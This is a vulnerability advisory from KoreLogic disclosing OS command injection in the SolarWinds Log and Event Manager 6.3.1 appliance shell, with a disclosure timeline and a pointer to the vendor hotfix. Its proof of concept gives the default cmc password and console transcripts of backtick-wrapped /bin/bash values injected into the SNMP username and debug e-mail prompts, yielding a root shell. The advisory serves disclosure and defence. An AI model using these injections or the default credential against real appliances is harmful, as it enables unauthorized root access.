Solarwinds LEM Management Shell Escape via Command Injection

2017-04-24T00:00:00
ID KL-001-2017-007
Type korelogic
Reporter Matt Bergin (@thatguylevel)
Modified 2017-04-24T00:00:00

Description

Title: Solarwinds LEM Management Shell Escape via Command Injection Advisory ID: KL-001-2017-007 Publication Date: 2017.04.24 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-007.txt

  1. Vulnerability Details

    Affected Vendor: Solarwinds Affected Product: Log and Event Manager Virtual Appliance Affected Version: v6.3.1 Platform: Embedded Linux CWE Classification: CWE-78: Improper Neutralization of Special Elements used in an OS Command Impact: Privileged Access Attack vector: SSH

  2. Vulnerability Description

    Insufficient input validation in the management interface can be leveraged in order to execute arbitrary commands. This can lead to (root) shell access to the underlying operating system.

  3. Technical Description

    Should an attacker gain access to the SSH console for the cmc user, root access to the underlying operating system can be achieved. The default password for the cmc user is "password".

    This report details two distinct attack vectors: the username input during SNMP setup and the destination email input during debug.

============ = SNMP = ============

 This is accomplished by placing `/bin/bash` in the username
 input during SNMP server setup.

 $ ssh cmc@1.3.3.7
 Password:
 Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
 Last login: Sun Dec 11 11:25:07 2016 from 1.3.3.6
   //////////////////////////////////////////////////
   ///       SolarWinds Log & Event Manager       ///
   ///                   management console       ///
   //////////////////////////////////////////////////

 Detected VMware Virtual Platform
 Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
 Available commands:
   [ appliance ]  Network, System
   [ manager ]    Upgrade, Debug
   [ service ]    Restrictions, SSH, Snort
   [ ndepth ]     nDepth Configuration/Maintenance
     upgrade      Upgrade this Appliance
     admin        Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)
     import       Import a file that can be used from the Admin UI
     help         display this help
     exit         Exit
 cmc > service
 Available commands:
     startssh           Start the SSH Service
     stopssh            Stop the SSH Service
     restartssh         Restart the SSH Service
     restrictssh        Restrict Access to the SSH Service (by IP Address/hostname)
     unrestrictssh      Remove Restrictions on Access to the SSH Service
     snmp               Configure the SNMP Services
     copysnortrules     Copy Snort rules to floppy or network share
     loadsnortrules     Load Snort rules from floppy or network share
     loadsnortbackup    Load Snort rules from backup
     restartsnort       Restart the Snort Service
     enableflow         * Enable the flow Collection Service
     disableflow        Disable the flow Collection Service
     restrictconsole    Restrict Access to the Manager Console (GUI) by IP/hostname
     unrestrictconsole  Remove Restrictions on Access to the Console (GUI)
     restrictreports    Restrict Access to Reports by IP/hostname
     unrestrictreports  Remove Restrictions on Access to Reports
     stopopsec          Stop all running OPSEC LEA client connections
     help               display this help
     exit               Return to main menu

     NOTE: Commands with an asterisk (*) include an automatic manager service restart
 cmc::service > snmp
 SNMP Trap Logging Service is RUNNNING
 Would you like to STOP the SNMP Trap Logging Service? [Y/n] Y

 SNMP Request Service is RUNNNING
 Would you like to STOP the SNMP Request Service? [Y/n] Y

 The SNMP Trap Logging Service is stopped.
 The SNMP Request Service is stopped.
 cmc::service > snmp
 SNMP Trap Logging Service is DISABLED
 Would you like to ENABLE the SNMP Trap Logging Service? [Y/n] Y

 SNMP Request Service is DISABLED
 Would you like to ENABLE the SNMP Request Service? [Y/n] Y

 Enter the port number to access SNMP on LEM (default: 161):
 Enter the username to access SNMP on LEM (default: orion): `/bin/bash`
 Enter the password hashing algorithm (SHA1, MD5 or NO for no authentication, default: SHA1):
 Enter the authentication password (default: orion123):
 Enter the communication encryption algorithm (AES128, DES56 or NO for no encryption, default: AES128):
 Enter the encryption key (default: orion123):

 cmc@swi-lem:/usr/local/contego$

============ = Debug = ============

 This is accomplished by placing `/bin/bash` in the destination
 email input during debug.

 $ ssh cmc@1.3.3.7
 Password:
 Linux swi-lem 3.2.0-3-amd64 #1 SMP Mon Jul 23 02:45:17 UTC 2012 x86_64
 Last login: Sun Dec 11 23:57:16 2016 from 1.3.3.6
   //////////////////////////////////////////////////
   ///       SolarWinds Log & Event Manager       ///
   ///                   management console       ///
   //////////////////////////////////////////////////

 Detected VMware Virtual Platform
 Product Support Key: RPFYJ-2L3RW-RV5T-GA3K-VLULC-XAPTH
 Available commands:
   [ appliance ]  Network, System
   [ manager ]    Upgrade, Debug
   [ service ]    Restrictions, SSH, Snort
   [ ndepth ]     nDepth Configuration/Maintenance
     upgrade      Upgrade this Appliance
     admin        Run Admin UI (for better usability browse https://1.3.3.7/mvc/configuration)
     import       Import a file that can be used from the Admin UI
     help         display this help
     exit         Exit
 cmc > manager
 Available commands:
     actortoolupgrade   * Upgrade your Manager's Actor Tools (CD/floppy)
     archiveconfig      Set your Manager Database Archive Schedule/Settings
     backupconfig       Set your Manager Backup Schedule/Settings
     cleanagentconfig   Reconfigure the agent on this box to a new manager
     configurendepth    * Configure the manager to use an nDepth server.
     confselfsignedcert * Configure the manager to use a self signed certificate
     dbrestart          Restart database
     debug              Send Debugging Information to an Alternate Address
     disabletls         Disable TLS for DB connections
     enabletls          Enable TLS for DB connections
     exportcert         Export the CA certificate for console
     exportcertrequest  Export a certificate request for signing by CA
     hotfix             Install LEM hotfix.
     importcert         * Import a certificate used for console communication
     importl4ca         * Import a CA of the other node in L4 configuration
     licenseupgrade     * Upgrade your Manager License (CD/floppy/network)
     logbackupconfig    Set your Manager Log Backup Schedule/Settings
     resetadmin         Reset the "admin" user password to default
     restart            * Restart Manager Service
     sensortoolupgrade  Upgrade your Manager and Agent Sensor Tools (CD/floppy)
     showlog            Show Manager Log File
     showmanagermem     Show the memory setting of SolarWinds manager
     start              Start Manager Service
     stop               * Stop Manager Service
     support            Send Debugging Information to Tech Support @trigeo.com
     togglehttp         * Enable or disable HTTP (port 80).
     viewsysinfo        Show information about machine and SolarWinds manager
     watchlog           Watch Manager Log File
     exit               Return to main menu

     NOTE: Commands with an asterisk (*) include an automatic manager service restart
 cmc::manager > debug
 Press <enter> to capture debugging information
 You will need to provide an SMTP server or Windows File Sharing Credentials

 Collecting general system information......UpdateInfo failed: VMware Guest API is not enabled on the host
 UpdateInfo failed: VMware Guest API is not enabled on the host
 UpdateInfo failed: VMware Guest API is not enabled on the host
 UpdateInfo failed: VMware Guest API is not enabled on the host
 UpdateInfo failed: VMware Guest API is not enabled on the host
 UpdateInfo failed: VMware Guest API is not enabled on the host
 .e.sudo: unable to resolve host swi-lem
 sudo: unable to resolve host swi-lem
 .cat: /etc/hosts: No such file or directory
  done.
 sudo: unable to resolve host swi-lem
 E-Mail/Network share/Quit? (e/n/q) e
 E-Mail/Network share/Quit? (e/n/q) e
 Please enter the e-mail recipient:
    (e.g. support@trigeo.com)
 > `/bin/bash >&2`
 Is the e-mail address <`/bin/bash >&2`> correct? <Y/n> Y
 Please enter the name this message should appear from
    (e.g. Someone Important)
 > Test
 Is the name Test correct? <Y/n> Y
 Please enter the e-mail address this message should appear from
    (e.g. someone@trigeo.com)
 > fake@localhost
 Is the e-mail address fake@localhost correct? <Y/n> Y
 Please enter the SMTP server you wish to send mail through
    (e.g. smtp.yournetwork.com)
 > 127.0.0.1
 Is the SMTP server 127.0.0.1 correct? <Y/n> Y
 Please enter the name of your company
    (e.g. Initech, Post Falls branch or Veridian Dynamics)
 > Test
 Is the company Test correct? <Y/n> Y
 Please enter a phone number where you can be reached
    (e.g. 509.555.1234)
 > Test
 Is the number Test correct? <Y/n> Y

 --(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]--
 /tmp # id
 uid=0(root) gid=0(root) groups=0(root)
 --(0)-[1.3.3.7]-[6.3.1]-[root@swi-lem]--
  1. Mitigation and Remediation Recommendation

    The vendor has released a Hotfix to remediate this vulnerability. Hotfix and installation instructions are available at:

    https://thwack.solarwinds.com/thread/111223

  2. Credit

    This vulnerability was discovered by Matt Bergin (@thatguylevel) and Hank Leininger of KoreLogic, Inc.

  3. Disclosure Timeline

    2017.02.16 - KoreLogic sends vulnerability report and PoC to Solarwinds <psirt@solarwinds.com> using PGP key with fingerprint A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F. 2017.02.20 - Solarwinds replies that the key is no longer in use, requests alternate communication channel. 2017.02.22 - KoreLogic submits vulnerability report and PoC to alternate Solarwinds contact. 2017.02.23 - Solarwinds confirms receipt of vulnerability report. 2017.04.06 - 30 business days have elapsed since Solarwinds acknowledged receipt of vulnerability details. 2017.04.11 - Solarwinds releases hotfix and public disclosure. 2017.04.24 - KoreLogic public disclosure.

  4. Proof of Concept

    See 3. Technical Description